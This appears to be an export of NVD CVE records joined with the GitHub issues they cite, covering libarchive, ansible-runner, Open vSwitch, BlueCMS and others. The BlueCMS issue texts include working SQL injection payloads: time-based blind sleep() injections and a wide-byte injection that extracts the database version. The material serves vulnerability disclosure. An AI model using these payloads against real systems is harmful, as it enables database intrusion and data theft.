"criteria": "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "F4CFF558-3C47-480D-A2F0-BABF26042943", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false }, { "criteria": "cpe:2.3:o:redhat:enterprise_linux_eus:8.6:*:*:*:*:*:*:*", "matchCriteriaId": "6C3741B8-851F-475D-B428-523F4F722350", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false }, { "criteria": "cpe:2.3:o:redhat:enterprise_linux_for_ibm_z_systems:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "87C21FE1-EA5C-498F-9C6C-D05F91A88217", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false }, { "criteria": "cpe:2.3:o:redhat:enterprise_linux_for_ibm_z_systems_eus:8.6:*:*:*:*:*:*:*", "matchCriteriaId": "9EF5C4AC-CA69-41E3-AD93-7AC21931374A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false }, { "criteria": "cpe:2.3:o:redhat:enterprise_linux_for_power_little_endian:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "47811209-5CE5-4375-8391-B0A7F6A0E420", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false }, { "criteria": "cpe:2.3:o:redhat:enterprise_linux_for_power_little_endian_eus:8.6:*:*:*:*:*:*:*", "matchCriteriaId": "729C515E-1DD3-466D-A50B-AFE058FFC94A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:splunk:universal_forwarder:*:*:*:*:*:*:*:*", "matchCriteriaId": "5722E753-75DE-4944-A11B-556CB299B57D", "versionEndExcluding": "8.2.12", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "8.2.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:splunk:universal_forwarder:*:*:*:*:*:*:*:*", "matchCriteriaId": "DC0F9351-81A4-4FEA-B6B5-6E960A933D32", "versionEndExcluding": "9.0.6", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "9.0.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:splunk:universal_forwarder:9.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "EED24E67-2957-4C1B-8FEA-E2D2FE7B97FC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "59" ]
59
https://github.com/libarchive/libarchive/issues/1566
[ "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "libarchive", "libarchive" ]
Some modes, times, ACLs and file flags especially on directories are set on archive_write_close() time. An archive can contain multiple entries with the same path. If a directory entry is marked for post-processing and a symlink entry with the same path "replaces" the directory with the symlink, the "fixup" postprocessing may alter the link target instead of the file itself.
[SECURITY] Processing fixup entries may follow symbolic links
https://api.github.com/repos/libarchive/libarchive/issues/1566/comments
4
2021-08-22T04:09:32Z
2021-12-17T07:37:45Z
https://github.com/libarchive/libarchive/issues/1566
976,279,379
1,566
4,028
CVE-2021-3701
2022-08-23T16:15:09.500
A flaw was found in ansible-runner where the default temporary files configuration in ansible-2.0.0 are written to world R/W locations. This flaw allows an attacker to pre-create the directory, resulting in reading private information or forcing ansible-runner to write files as the legitimate user in a place they did not expect. The highest threat from this vulnerability is to confidentiality and integrity.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 6.6, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 1.3, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": [ "Vendor Advisory" ], "url": "https://access.redhat.com/security/cve/CVE-2021-3701" }, { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Patch", "Vendor Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1977959" }, { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/ansible/ansible-runner/issues/738" }, { "source": "secalert@redhat.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ansible/ansible-runner/pull/742/commits" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "https://access.redhat.com/security/cve/CVE-2021-3701" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Vendor Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1977959" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/ansible/ansible-runner/issues/738" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ansible/ansible-runner/pull/742/commits" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:redhat:ansible_runner:2.0.0:-:*:*:*:*:*:*", "matchCriteriaId": "1470BAF6-3B08-42DB-AD44-B5887D24D787", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "276" ]
276
https://github.com/ansible/ansible-runner/issues/738
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "ansible", "ansible-runner" ]
related to: https://github.com/ansible/ansible-runner/pull/722
ansible-runner writes artifacts to world rw location by default
https://api.github.com/repos/ansible/ansible-runner/issues/738/comments
2
2021-06-24T20:55:44Z
2021-06-29T13:01:34Z
https://github.com/ansible/ansible-runner/issues/738
929,605,116
738
4,029
CVE-2021-3905
2022-08-23T16:15:10.177
A memory leak was found in Open vSwitch (OVS) during userspace IP fragmentation processing. An attacker could use this flaw to potentially exhaust available memory by keeping sending packet fragments.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/security/cve/CVE-2021-3905" }, { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2019692" }, { "source": "secalert@redhat.com", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/openvswitch/ovs-issues/issues/226" }, { "source": "secalert@redhat.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/openvswitch/ovs/commit/803ed12e31b0377c37d7aa8c94b3b92f2081e349" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://security.gentoo.org/glsa/202311-16" }, { "source": "secalert@redhat.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://ubuntu.com/security/CVE-2021-3905" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/security/cve/CVE-2021-3905" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2019692" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/openvswitch/ovs-issues/issues/226" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/openvswitch/ovs/commit/803ed12e31b0377c37d7aa8c94b3b92f2081e349" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://security.gentoo.org/glsa/202311-16" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://ubuntu.com/security/CVE-2021-3905" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:openvswitch:openvswitch:*:*:*:*:*:*:*:*", "matchCriteriaId": "59369EE4-B970-4222-AA4E-276928B1016B", "versionEndExcluding": "2.17.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:redhat:enterprise_linux_fast_datapath:7.0:*:*:*:*:*:*:*", "matchCriteriaId": "559A4609-EC7E-40CD-9165-5DA68CBCEE9B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:enterprise_linux_fast_datapath:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "BAE5723C-165D-4427-A8DF-82662A2E7A9F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:21.10:*:*:*:*:*:*:*", "matchCriteriaId": "AAE4D2D0-CEEB-416F-8BC5-A7987DF56190", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*", "matchCriteriaId": "80E516C0-98A4-4ADE-B69F-66A772E2BAAA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "401" ]
401
https://github.com/openvswitch/ovs-issues/issues/226
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "openvswitch", "ovs-issues" ]
Hi, This commit introduce a mempool memleak. [640d4db788eda96bb904abcfc7de2327107bafe1](https://github.com/openvswitch/ovs/commit/640d4db788eda96bb904abcfc7de2327107bafe1) If I keep sending first fragment as an attack, the mempool would be exhausted. I think revert it and respect the dnsteal flag as @ Wang Liang mentioned in https://mail.openvswitch.org/pipermail/ovs-dev/2021-April/382098.html would be better. ``` frag->pkt = dnsteal ? dp_packet_clone(pkt) : pkt; ```
ipf memleak
https://api.github.com/repos/openvswitch/ovs-issues/issues/226/comments
10
2021-09-29T09:58:10Z
2021-10-12T05:47:39Z
https://github.com/openvswitch/ovs-issues/issues/226
1,010,749,369
226
4,030
CVE-2022-37111
2022-08-23T16:15:11.677
BlueCMS 1.6 has SQL injection in line 132 of admin/article.php
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/seizer-zyx/Vulnerability/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/seizer-zyx/Vulnerability/issues/1" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:bluecms_project:bluecms:1.6:*:*:*:*:*:*:*", "matchCriteriaId": "6A26806A-9CB5-4262-BAD1-049659C2CE2C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/seizer-zyx/Vulnerability/issues/1
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "seizer-zyx", "Vulnerability" ]
# Bluecms_v1.6 ## Download http://lp.downcode.com/j_14/j_14745_bluecms.rar ## vulnerability code: in admin/article.php line132: ![image](https://user-images.githubusercontent.com/73650154/180907799-b1e21d1e-1547-437e-b432-c78657ead087.png) There is numeric injection for $_GET['id'] Because there is no echo, you can blind SQL injection with sleep() payload: id=1%20or%20if(1=1,sleep(1),0) ![image](https://user-images.githubusercontent.com/73650154/180907921-b6ac972f-7eb7-4e00-a463-6c55432d3d96.png) payload: id=1%20or%20if(1=2,sleep(1),0) ![image](https://user-images.githubusercontent.com/73650154/180907898-db359d18-2660-4b39-ace8-1f28d8fc34fb.png) sleep () is executed based on the server response speed Use exp to get the database version number ![image](https://user-images.githubusercontent.com/73650154/180939779-b6f8f05a-413d-4cca-b58d-33403dbcd2c3.png)
Bluecms V1.6 has SQL injection in line 132 of admin/article.php
https://api.github.com/repos/seizer-zyx/Vulnerability/issues/1/comments
0
2022-07-26T02:16:33Z
2022-07-26T06:37:09Z
https://github.com/seizer-zyx/Vulnerability/issues/1
1,317,605,361
1
4,031
CVE-2022-37112
2022-08-23T16:15:11.717
BlueCMS 1.6 has SQL injection in line 55 of admin/model.php
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/seizer-zyx/Vulnerability/issues/2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/seizer-zyx/Vulnerability/issues/2" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:bluecms_project:bluecms:1.6:*:*:*:*:*:*:*", "matchCriteriaId": "6A26806A-9CB5-4262-BAD1-049659C2CE2C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/seizer-zyx/Vulnerability/issues/2
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "seizer-zyx", "Vulnerability" ]
## Download http://lp.downcode.com/j_14/j_14745_bluecms.rar ## vulnerability code: in admin/model.php line 55: ![image](https://user-images.githubusercontent.com/73650154/180944559-a8f7f4fc-3354-44f7-87af-ae5c41445ad0.png) There is numeric injection for $_GET['model_id'] Because there is no echo, you can blind SQL injection with sleep() payload: act=del&model_id=sleep(1) ![image](https://user-images.githubusercontent.com/73650154/180944740-b7949081-fdf0-475b-b399-45e1f28120e0.png) sleep () is executed based on the server response speed Use exp to get the database version number ![image](https://user-images.githubusercontent.com/73650154/180944884-e466c51b-cbba-4373-99e1-2040c91b7e26.png)
Bluecms V1.6 has SQL injection in line 55 of admin/model.php
https://api.github.com/repos/seizer-zyx/Vulnerability/issues/2/comments
0
2022-07-26T07:07:06Z
2022-07-26T07:07:06Z
https://github.com/seizer-zyx/Vulnerability/issues/2
1,317,796,057
2
4,032
CVE-2022-37113
2022-08-23T16:15:11.757
Bluecms 1.6 has SQL injection in line 132 of admin/area.php
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/seizer-zyx/Vulnerability/issues/3" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/seizer-zyx/Vulnerability/issues/3" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:bluecms_project:bluecms:1.6:*:*:*:*:*:*:*", "matchCriteriaId": "6A26806A-9CB5-4262-BAD1-049659C2CE2C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/seizer-zyx/Vulnerability/issues/3
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "seizer-zyx", "Vulnerability" ]
# Bluecms_v1.6 ## Download http://lp.downcode.com/j_14/j_14745_bluecms.rar ## vulnerability code: in admin/area.php line 36: ![2022-07-26-16-58-55-image](https://user-images.githubusercontent.com/73650154/180971155-874a2cd3-0ddf-4326-988f-6444605aa3a0.png) Line 36 of admin/area.php is not heavily filtered, and insert at line 47 allows injection Single quotes cannot be injected because the argument passed in is get_magic_quotes_gpc() However, we found the use code `GB2312` in the returned response header ![image](https://user-images.githubusercontent.com/73650154/180971721-1b6ac135-1906-4511-b155-05f615c4d027.png) ![image](https://user-images.githubusercontent.com/73650154/180971603-1926cac5-ec23-41a1-9b1a-2930ad8885b2.png) So we can do wide-byte injection here payload: area_name=0%df',0,0,0,0),(0,@@version,0,0,0,0)%23&parentid=0&show_order=0&act=doadd ![2022-07-26-17-14-52-image](https://user-images.githubusercontent.com/73650154/180972276-c7763285-6f1d-4c47-adce-6587b8211638.png) ![2022-07-26-17-15-03-image](https://user-images.githubusercontent.com/73650154/180972282-400f7d3c-0094-46fe-80f2-e54ee91f285a.png) Successful injection!
Bluecms V1.6 has SQL injection in line 132 of admin/area.php
https://api.github.com/repos/seizer-zyx/Vulnerability/issues/3/comments
0
2022-07-26T09:22:51Z
2022-07-26T09:22:51Z
https://github.com/seizer-zyx/Vulnerability/issues/3
1,317,952,065
3
4,033
CVE-2021-3917
2022-08-23T20:15:08.360
A flaw was found in the coreos-installer, where it writes the Ignition config to the target system with world-readable access permissions. This flaw allows a local attacker to have read access to potentially sensitive data. The highest threat from this vulnerability is to confidentiality.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": [ "Patch", "Vendor Advisory" ], "url": "https://access.redhat.com/security/cve/CVE-2021-3917" }, { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Vendor Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2018478" }, { "source": "secalert@redhat.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/coreos/coreos-installer/commit/2a36405339c87b16ed6c76e91ad5b76638fbdb0c" }, { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/coreos/fedora-coreos-tracker/issues/889" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Vendor Advisory" ], "url": "https://access.redhat.com/security/cve/CVE-2021-3917" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Vendor Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2018478" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/coreos/coreos-installer/commit/2a36405339c87b16ed6c76e91ad5b76638fbdb0c" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/coreos/fedora-coreos-tracker/issues/889" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:redhat:coreos-installer:*:*:*:*:*:*:*:*", "matchCriteriaId": "A5FB7948-D4C7-4806-A707-B1F4FC340F97", "versionEndExcluding": "0.10.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "276" ]
276
https://github.com/coreos/fedora-coreos-tracker/issues/889
[ "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "coreos", "fedora-coreos-tracker" ]
In the ignition file sometimes contains secrets and the best option maybe for this is denied access to unauthorized users. The only way to access has to be through `sudo` or with the root account.
Change `/boot/ignition/config.ign` permissions to 0600 and delete it after provisioning
https://api.github.com/repos/coreos/fedora-coreos-tracker/issues/889/comments
19
2021-07-06T13:02:39Z
2021-11-23T05:22:02Z
https://github.com/coreos/fedora-coreos-tracker/issues/889
937,874,394
889
4,034
CVE-2021-4178
2022-08-24T16:15:09.770
A arbitrary code execution flaw was found in the Fabric 8 Kubernetes client affecting versions 5.0.0-beta-1 and above. Due to an improperly configured YAML parsing, this will allow a local and privileged attacker to supply malicious YAML.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 6.7, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 0.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": [ "Vendor Advisory" ], "url": "https://access.redhat.com/security/cve/CVE-2021-4178" }, { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Vendor Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2034388" }, { "source": "secalert@redhat.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/advisories/GHSA-98g7-rxmf-rrxm" }, { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/fabric8io/kubernetes-client/issues/3653" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "https://access.redhat.com/security/cve/CVE-2021-4178" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Vendor Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2034388" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/advisories/GHSA-98g7-rxmf-rrxm" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/fabric8io/kubernetes-client/issues/3653" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:redhat:fabric8-kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "9C5E8807-F660-4409-A21C-754651357607", "versionEndExcluding": "5.0.3", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "5.0.1", "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:fabric8-kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "D7917BF3-0004-425B-81FB-B8FC91B67AC9", "versionEndExcluding": "5.1.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "5.1.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:fabric8-kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "EB204B60-8C18-4CB9-87AD-881554AA3670", "versionEndExcluding": "5.3.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "5.2.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:fabric8-kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "D84A3A14-3DF4-4FAB-B0DA-844C71D5DDE6", "versionEndExcluding": "5.7.4", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "5.5.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:fabric8-kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "7E9612B1-9CD0-4D67-A081-7C6FAE15C67A", "versionEndExcluding": "5.10.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "5.9.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:fabric8-kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "B44CBDE1-11E2-437A-8E18-FDF2BEA698E3", "versionEndExcluding": "5.11.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "5.11.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:fabric8-kubernetes:5.0.0:beta1:*:*:*:*:*:*", "matchCriteriaId": "1C52990C-0DA1-470A-9C32-89AE565F8F4F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:fabric8-kubernetes:5.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "9F5C7BC4-0891-42A0-85EA-A2C3AE54F383", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:redhat:a-mq_streams:2.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "40D55461-678A-494A-B678-3D491E657D2C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:build_of_quarkus:2.2.5:*:*:*:*:*:*:*", "matchCriteriaId": "B65B37D5-BC88-4BD7-A2A9-DE96C8F01C65", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:descision_manager:7.0:*:*:*:*:*:*:*", "matchCriteriaId": "D5863BBF-829E-44EF-ACE8-61D5037251F6", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:fuse:7.11:*:*:*:*:*:*:*", "matchCriteriaId": "3CB90AE6-BE72-47F4-8888-1232E297AF68", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:integration_camel_k:-:*:*:*:*:*:*:*", "matchCriteriaId": "B87C8AD3-8878-4546-86C2-BF411876648C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:integration_camel_quarkus:2.2.1:*:*:*:*:*:*:*", "matchCriteriaId": "5D9347A4-D0A9-4EC5-959B-877FFC2F93CE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:openshift_application_runtimes:-:*:*:*:*:*:*:*", "matchCriteriaId": "A33441B3-B301-426C-A976-08CE5FE72EFB", 